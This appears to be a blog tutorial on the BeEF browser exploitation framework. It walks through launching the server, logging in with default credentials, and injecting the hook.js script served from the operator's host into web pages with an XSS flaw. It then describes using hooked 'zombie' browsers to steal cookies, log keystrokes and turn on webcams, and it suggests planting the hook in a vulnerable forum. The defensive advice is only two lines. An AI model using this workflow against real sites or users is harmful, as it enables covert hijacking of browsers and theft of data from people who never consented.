Beef is a powerful professional security tool, unlike other security tools, beef focuses on exploiting vulnerabilities on the browser (client) side to assess the security level of a target. Thanks to Beef, and its xss attack vector, it is possible to transform a victim into a zombie.
What can we do with beef?
- Information retrieval
- Theft of cookies (obviously)
- List of sites / domains visited
- Browser fingerprint (OS, plugins, etc.)
When a user runs BeEF, two components are opened: the user interface and the communication server (CRC). These two elements are the basic building blocks of Beef.
This is the interface for controlling the use of beef. From there, a user can see the victims who are online and offline, perform exploits against them, and see the results.
The Communication Server (CS) is the component that communicates via HTTP with infected browsers.
Beef is available on Linux with the Kali Linux distribution. If you have a Windows computer then I advise you before going further to install a Linux distribution (like kali Linux) on a virtual machine. Just download VMware and an image of Kali Linux. Beef is already pre-installed on it. here is how to install Kali Linux on a Windows machine with VMware.
However you can install beef on Windows, for that see: http://code.google.com/p/beef/wiki/WindowsInstall
To install it on another Linux or OSX distribution - see: http://code.google.com/p/beef/wiki/Install
How to use Beef?
To start, launch the beef server in Backtrack. To do this, go to the menu:
Application -> backtrack-> Application -> Exploitation tools -> Social Engineering Tools -> Beef XSS Framwork-> Beef
The server will start in a few seconds then you will have a window with information on the links used for the web interface as well as the script that you must inject into vulnerable pages.
In the example above, you can see, there are multiple network interfaces. You can now access the administration interface (web interface) using these URLs.
In my case, the administration interface is: http://192.168.230.128:3000/ui/panel and the script to inject is: http://192.168.230.128:3000/hook.js
After launching the administration page, you will have an authentication page. Log in to the Beef server using the default credentials (beef / beef).
Once connected, you will have a page divided into 4 parts:
- Zombie part: this is where your connected victims are
- Command part: in this part contains a number of commands that can be executed on the target with a colored indicator about their, relative safety. this is the most powerful part of Beef framework.
- Result party: the results of the executed commands will be listed here.
- Party description: here you will have the description of each order.
It now remains to inject the hook.js into a vulnerable forum or simply a web application that contains a XSS flaw.
However you can test beef locally using the beef demo page: http://127.0.0.1:3000/demos/basic.html
After the browser infection, you should see a target added to the left of the administration panel.
Finally, select this browser to display information on the target, so you can launch commands to have the last sites visited or to place a keylogger or to start the target's camera.
How to protect yourself?
- Updating browsers and plugins is the first rule!
- Install a firewall on your machine
Beef is an easy to use and very practical tool. Thanks to beef, advanced XSS attacks become easy to perform.
I hope I was able to convince you that the impact of an XSS vulnerability is terrible and that with a tool like beef, you can turn a simple XSS vulnerability into a very dangerous vulnerability.
And before I forget… Consider sharing this article by clicking on the social network buttons. It will give me great pleasure! 🙂